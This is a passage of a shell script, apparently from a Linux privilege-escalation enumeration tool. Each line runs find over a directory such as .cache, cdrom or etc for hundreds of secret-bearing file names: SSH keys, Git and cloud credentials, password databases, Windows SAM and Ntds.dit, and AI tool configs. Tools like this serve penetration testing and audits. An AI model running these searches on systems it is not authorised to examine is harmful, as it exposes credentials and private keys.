-o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    768   FIND_CACHE=`eval_bckgrd "find ${ROOT_FOLDER}.cache -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    769   FIND_CDROM=`eval_bckgrd "find ${ROOT_FOLDER}cdrom -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    770   FIND_ETC=`eval_bckgrd "find ${ROOT_FOLDER}etc -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"*knockd*\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"sitemanager.xml\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"exports\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name 